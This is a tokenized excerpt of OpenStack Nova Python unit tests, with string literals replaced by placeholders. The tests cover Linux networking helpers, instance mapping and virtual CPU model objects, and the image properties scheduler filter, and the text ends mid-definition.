assert_called_once_with ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , network_model . OVS_VHOSTUSER_INTERFACE_TYPE ) <EOL> self . assertFalse ( mock_set_device_mtu . called ) <EOL> self . assertTrue ( mock_vsctl . called ) <EOL> def test_ovs_vif_port_with_mtu ( self ) : <EOL> self . flags ( network_device_mtu = <NUM_LIT> ) <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , run_as_root = True , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] ) <EOL> ] <EOL> self . _ovs_vif_port ( calls ) <EOL> def _create_veth_pair ( self , calls ) : <EOL> with mock . patch . object ( utils , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) as ex : <EOL> linux_net . _create_veth_pair ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ex . assert_has_calls ( calls ) <EOL> def test_create_veth_pair ( self ) : <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> ] <EOL> self . 
_create_veth_pair ( calls ) <EOL> def test_create_veth_pair_with_mtu ( self ) : <EOL> self . flags ( network_device_mtu = <NUM_LIT> ) <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , run_as_root = True , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , run_as_root = True , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] ) <EOL> ] <EOL> self . _create_veth_pair ( calls ) <EOL> def test_exec_ebtables_success ( self ) : <EOL> executes = [ ] <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> self . stubs . Set ( self . driver , '<STR_LIT>' , fake_execute ) <EOL> self . driver . _exec_ebtables ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( executes ) ) <EOL> self . mox . 
UnsetStubs ( ) <EOL> def _ebtables_race_stderr ( self ) : <EOL> return ( u"<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_exec_ebtables_fail_all ( self ) : <EOL> executes = [ ] <EOL> def fake_sleep ( interval ) : <EOL> pass <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> raise processutils . ProcessExecutionError ( '<STR_LIT:error>' , <EOL> stderr = self . _ebtables_race_stderr ( ) ) <EOL> self . stubs . Set ( time , '<STR_LIT>' , fake_sleep ) <EOL> self . stubs . Set ( self . driver , '<STR_LIT>' , fake_execute ) <EOL> self . assertRaises ( processutils . ProcessExecutionError , <EOL> self . driver . _exec_ebtables , '<STR_LIT>' ) <EOL> max_calls = CONF . ebtables_exec_attempts <EOL> self . assertEqual ( max_calls , len ( executes ) ) <EOL> self . mox . UnsetStubs ( ) <EOL> def test_exec_ebtables_fail_no_retry ( self ) : <EOL> executes = [ ] <EOL> def fake_sleep ( interval ) : <EOL> pass <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> raise processutils . ProcessExecutionError ( '<STR_LIT:error>' , <EOL> stderr = "<STR_LIT>" ) <EOL> self . stubs . Set ( time , '<STR_LIT>' , fake_sleep ) <EOL> self . stubs . Set ( self . driver , '<STR_LIT>' , fake_execute ) <EOL> self . assertRaises ( processutils . ProcessExecutionError , <EOL> self . driver . _exec_ebtables , '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( executes ) ) <EOL> self . mox . UnsetStubs ( ) <EOL> def test_exec_ebtables_fail_once ( self ) : <EOL> executes = [ ] <EOL> def fake_sleep ( interval ) : <EOL> pass <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> if len ( executes ) == <NUM_LIT:1> : <EOL> raise processutils . ProcessExecutionError ( '<STR_LIT:error>' , <EOL> stderr = self . 
_ebtables_race_stderr ( ) ) <EOL> else : <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> self . stubs . Set ( time , '<STR_LIT>' , fake_sleep ) <EOL> self . stubs . Set ( self . driver , '<STR_LIT>' , fake_execute ) <EOL> self . driver . _exec_ebtables ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( executes ) ) <EOL> self . mox . UnsetStubs ( ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = True ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_remove_bridge ( self , mock_execute , mock_exists ) : <EOL> linux_net . LinuxBridgeInterfaceDriver . remove_bridge ( '<STR_LIT>' ) <EOL> expected_exists_args = mock . call ( '<STR_LIT>' ) <EOL> expected_execute_args = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , run_as_root = True ) ] <EOL> self . assertIn ( expected_exists_args , mock_exists . mock_calls ) <EOL> self . assertEqual ( expected_execute_args , mock_execute . mock_calls ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' , return_value = False ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> def test_ensure_vlan ( self , mock_set_device_mtu , mock_device_exists , <EOL> mock_execute ) : <EOL> interface = linux_net . LinuxBridgeInterfaceDriver . ensure_vlan ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , interface ) <EOL> mock_device_exists . assert_called_once_with ( '<STR_LIT>' ) <EOL> expected_execute_args = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , <EOL> '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT:id>' , <NUM_LIT:1> , check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] , <EOL> run_as_root = True ) , <EOL> mock . 
call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' , '<STR_LIT>' , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] , run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] , run_as_root = True ) ] <EOL> self . assertEqual ( expected_execute_args , mock_execute . mock_calls ) <EOL> mock_set_device_mtu . assert_called_once_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' , return_value = True ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> def test_ensure_vlan_device_exists ( self , mock_set_device_mtu , <EOL> mock_device_exists , mock_execute ) : <EOL> interface = linux_net . LinuxBridgeInterfaceDriver . ensure_vlan ( <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . assertEqual ( "<STR_LIT>" , interface ) <EOL> mock_device_exists . assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertFalse ( mock_execute . called ) <EOL> mock_set_device_mtu . assert_called_once_with ( '<STR_LIT>' , None ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = True ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = processutils . ProcessExecutionError ( ) ) <EOL> def test_remove_bridge_negative ( self , mock_execute , mock_exists ) : <EOL> self . assertRaises ( processutils . ProcessExecutionError , <EOL> linux_net . LinuxBridgeInterfaceDriver . remove_bridge , <EOL> '<STR_LIT>' ) </s>
<s> import mock <EOL> from oslo_utils import uuidutils <EOL> from nova import objects <EOL> from nova . objects import instance_mapping <EOL> from nova . tests . unit . objects import test_cell_mapping <EOL> from nova . tests . unit . objects import test_objects <EOL> def get_db_mapping ( ** updates ) : <EOL> db_mapping = { <EOL> '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : uuidutils . generate_uuid ( ) , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> db_mapping [ "<STR_LIT>" ] = test_cell_mapping . get_db_mapping ( id = <NUM_LIT> ) <EOL> db_mapping [ '<STR_LIT>' ] = db_mapping [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] <EOL> db_mapping . update ( updates ) <EOL> return db_mapping <EOL> class _TestInstanceMappingObject ( object ) : <EOL> def _check_cell_map_value ( self , db_val , cell_obj ) : <EOL> self . assertEqual ( db_val , cell_obj . id ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , <EOL> '<STR_LIT>' ) <EOL> def test_get_by_instance_uuid ( self , uuid_from_db ) : <EOL> db_mapping = get_db_mapping ( ) <EOL> uuid_from_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( ) . get_by_instance_uuid ( <EOL> self . context , db_mapping [ '<STR_LIT>' ] ) <EOL> uuid_from_db . assert_called_once_with ( self . context , <EOL> db_mapping [ '<STR_LIT>' ] ) <EOL> self . compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> comparators = { <EOL> '<STR_LIT>' : self . _check_cell_map_value } ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , <EOL> '<STR_LIT>' ) <EOL> def test_get_by_instance_uuid_cell_mapping_none ( self , uuid_from_db ) : <EOL> db_mapping = get_db_mapping ( cell_mapping = None , cell_id = None ) <EOL> uuid_from_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( ) . get_by_instance_uuid ( <EOL> self . 
context , db_mapping [ '<STR_LIT>' ] ) <EOL> uuid_from_db . assert_called_once_with ( self . context , <EOL> db_mapping [ '<STR_LIT>' ] ) <EOL> self . compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , '<STR_LIT>' ) <EOL> def test_create ( self , create_in_db ) : <EOL> db_mapping = get_db_mapping ( ) <EOL> uuid = db_mapping [ '<STR_LIT>' ] <EOL> create_in_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . instance_uuid = uuid <EOL> mapping_obj . cell_mapping = objects . CellMapping ( self . context , <EOL> id = db_mapping [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> mapping_obj . project_id = db_mapping [ '<STR_LIT>' ] <EOL> mapping_obj . create ( ) <EOL> create_in_db . assert_called_once_with ( self . context , <EOL> { '<STR_LIT>' : uuid , <EOL> '<STR_LIT>' : db_mapping [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : db_mapping [ '<STR_LIT>' ] } ) <EOL> self . compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> comparators = { <EOL> '<STR_LIT>' : self . _check_cell_map_value } ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , '<STR_LIT>' ) <EOL> def test_create_cell_mapping_none ( self , create_in_db ) : <EOL> db_mapping = get_db_mapping ( cell_mapping = None , cell_id = None ) <EOL> uuid = db_mapping [ '<STR_LIT>' ] <EOL> create_in_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . instance_uuid = uuid <EOL> mapping_obj . cell_mapping = None <EOL> mapping_obj . project_id = db_mapping [ '<STR_LIT>' ] <EOL> mapping_obj . create ( ) <EOL> create_in_db . assert_called_once_with ( self . context , <EOL> { '<STR_LIT>' : uuid , <EOL> '<STR_LIT>' : db_mapping [ '<STR_LIT>' ] } ) <EOL> self . 
compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertIsNone ( mapping_obj . cell_mapping ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , '<STR_LIT>' ) <EOL> def test_save ( self , save_in_db ) : <EOL> db_mapping = get_db_mapping ( ) <EOL> uuid = db_mapping [ '<STR_LIT>' ] <EOL> save_in_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . instance_uuid = uuid <EOL> mapping_obj . cell_mapping = objects . CellMapping ( self . context , id = <NUM_LIT> ) <EOL> mapping_obj . save ( ) <EOL> save_in_db . assert_called_once_with ( self . context , <EOL> db_mapping [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : mapping_obj . cell_mapping . id , <EOL> '<STR_LIT>' : uuid } ) <EOL> self . compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> comparators = { <EOL> '<STR_LIT>' : self . _check_cell_map_value } ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , '<STR_LIT>' ) <EOL> def test_destroy ( self , destroy_in_db ) : <EOL> uuid = uuidutils . generate_uuid ( ) <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . instance_uuid = uuid <EOL> mapping_obj . destroy ( ) <EOL> destroy_in_db . assert_called_once_with ( self . context , uuid ) <EOL> def test_cell_mapping_nullable ( self ) : <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . cell_mapping = None <EOL> class TestInstanceMappingObject ( test_objects . _LocalTest , <EOL> _TestInstanceMappingObject ) : <EOL> pass <EOL> class TestRemoteInstanceMappingObject ( test_objects . _RemoteTest , <EOL> _TestInstanceMappingObject ) : <EOL> pass <EOL> class _TestInstanceMappingListObject ( object ) : <EOL> def _check_cell_map_value ( self , db_val , cell_obj ) : <EOL> self . assertEqual ( db_val , cell_obj . id ) <EOL> @ mock . patch . object ( instance_mapping . 
InstanceMappingList , <EOL> '<STR_LIT>' ) <EOL> def test_get_by_project_id ( self , project_id_from_db ) : <EOL> db_mapping = get_db_mapping ( ) <EOL> project_id_from_db . return_value = [ db_mapping ] <EOL> mapping_obj = objects . InstanceMappingList ( ) . get_by_project_id ( <EOL> self . context , db_mapping [ '<STR_LIT>' ] ) <EOL> project_id_from_db . assert_called_once_with ( self . context , <EOL> db_mapping [ '<STR_LIT>' ] ) <EOL> self . compare_obj ( mapping_obj . objects [ <NUM_LIT:0> ] , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> comparators = { <EOL> '<STR_LIT>' : self . _check_cell_map_value } ) <EOL> class TestInstanceMappingListObject ( test_objects . _LocalTest , <EOL> _TestInstanceMappingListObject ) : <EOL> pass <EOL> class TestRemoteInstanceMappingListObject ( test_objects . _RemoteTest , <EOL> _TestInstanceMappingListObject ) : <EOL> pass </s>
<s> from nova . compute import arch <EOL> from nova . compute import cpumodel <EOL> from nova import objects <EOL> from nova . tests . unit . objects import test_objects <EOL> fake_cpu_model_feature = { <EOL> '<STR_LIT>' : cpumodel . POLICY_REQUIRE , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> } <EOL> fake_cpu_model_feature_obj = objects . VirtCPUFeature ( <EOL> ** fake_cpu_model_feature ) <EOL> fake_vcpumodel_dict = { <EOL> '<STR_LIT>' : arch . I686 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cpumodel . MATCH_EXACT , <EOL> '<STR_LIT>' : objects . VirtCPUTopology ( sockets = <NUM_LIT:1> , cores = <NUM_LIT:1> , threads = <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : [ fake_cpu_model_feature_obj ] , <EOL> '<STR_LIT>' : cpumodel . MODE_HOST_MODEL , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> fake_vcpumodel = objects . VirtCPUModel ( ** fake_vcpumodel_dict ) <EOL> class _TestVirtCPUFeatureObj ( object ) : <EOL> def test_policy_limitation ( self ) : <EOL> obj = objects . VirtCPUFeature ( ) <EOL> self . assertRaises ( ValueError , setattr , obj , '<STR_LIT>' , '<STR_LIT:foo>' ) <EOL> class TestVirtCPUFeatureObj ( test_objects . _LocalTest , <EOL> _TestVirtCPUFeatureObj ) : <EOL> pass <EOL> class TestRemoteVirtCPUFeatureObj ( test_objects . _LocalTest , <EOL> _TestVirtCPUFeatureObj ) : <EOL> pass <EOL> class _TestVirtCPUModel ( object ) : <EOL> def test_create ( self ) : <EOL> model = objects . VirtCPUModel ( ** fake_vcpumodel_dict ) <EOL> self . assertEqual ( fake_vcpumodel_dict [ '<STR_LIT>' ] , model . model ) <EOL> self . assertEqual ( fake_vcpumodel_dict [ '<STR_LIT>' ] . sockets , <EOL> model . topology . sockets ) <EOL> feature = model . features [ <NUM_LIT:0> ] <EOL> self . assertEqual ( fake_cpu_model_feature [ '<STR_LIT>' ] , <EOL> feature . policy ) <EOL> def test_defaults ( self ) : <EOL> model = objects . VirtCPUModel ( ) <EOL> self . assertIsNone ( model . mode ) <EOL> self . assertIsNone ( model . model ) <EOL> self . assertIsNone ( model . 
vendor ) <EOL> self . assertIsNone ( model . arch ) <EOL> self . assertIsNone ( model . match ) <EOL> self . assertEqual ( [ ] , model . features ) <EOL> self . assertIsNone ( model . topology ) <EOL> def test_arch_field ( self ) : <EOL> model = objects . VirtCPUModel ( ** fake_vcpumodel_dict ) <EOL> self . assertRaises ( ValueError , setattr , model , '<STR_LIT>' , '<STR_LIT:foo>' ) <EOL> def test_serialize ( self ) : <EOL> modelin = objects . VirtCPUModel ( ** fake_vcpumodel_dict ) <EOL> modelout = objects . VirtCPUModel . from_json ( modelin . to_json ( ) ) <EOL> self . assertEqual ( modelin . mode , modelout . mode ) <EOL> self . assertEqual ( modelin . model , modelout . model ) <EOL> self . assertEqual ( modelin . vendor , modelout . vendor ) <EOL> self . assertEqual ( modelin . arch , modelout . arch ) <EOL> self . assertEqual ( modelin . match , modelout . match ) <EOL> self . assertEqual ( modelin . features [ <NUM_LIT:0> ] . policy , <EOL> modelout . features [ <NUM_LIT:0> ] . policy ) <EOL> self . assertEqual ( modelin . features [ <NUM_LIT:0> ] . name , modelout . features [ <NUM_LIT:0> ] . name ) <EOL> self . assertEqual ( modelin . topology . sockets , modelout . topology . sockets ) <EOL> self . assertEqual ( modelin . topology . cores , modelout . topology . cores ) <EOL> self . assertEqual ( modelin . topology . threads , modelout . topology . threads ) <EOL> class TestVirtCPUModel ( test_objects . _LocalTest , <EOL> _TestVirtCPUModel ) : <EOL> pass <EOL> class TestRemoteVirtCPUModel ( test_objects . _LocalTest , <EOL> _TestVirtCPUModel ) : <EOL> pass </s>
<s> from oslo_utils import versionutils <EOL> from nova . compute import arch <EOL> from nova . compute import hv_type <EOL> from nova . compute import vm_mode <EOL> from nova import objects <EOL> from nova . scheduler . filters import image_props_filter <EOL> from nova import test <EOL> from nova . tests . unit . scheduler import fakes <EOL> class TestImagePropsFilter ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestImagePropsFilter , self ) . setUp ( ) <EOL> self . filt_cls = image_props_filter . ImagePropertiesFilter ( ) <EOL> def test_image_properties_filter_passes_same_inst_props_and_version ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM , <EOL> img_hv_requested_version = '<STR_LIT>' ) ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_different_inst_props ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . ARMV7 , <EOL> img_hv_type = hv_type . QEMU , <EOL> hw_vm_mode = vm_mode . HVM ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . 
filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_different_hyper_version ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM , <EOL> img_hv_requested_version = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_passes_partial_inst_props ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> hw_vm_mode = vm_mode . HVM ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_partial_inst_props ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> hw_vm_mode = vm_mode . HVM ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . XEN , vm_mode . 
XEN ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_passes_without_inst_props ( self ) : <EOL> spec_obj = objects . RequestSpec ( image = None ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_without_host_props ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_passes_without_hyper_version ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM , <EOL> img_hv_requested_version = '<STR_LIT>' ) ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . 
assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_with_unsupported_hyper_ver ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM , <EOL> img_hv_requested_version = '<STR_LIT>' ) ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : <NUM_LIT> } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_pv_mode_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_vm_mode = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . XEN , vm_mode . XEN ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def 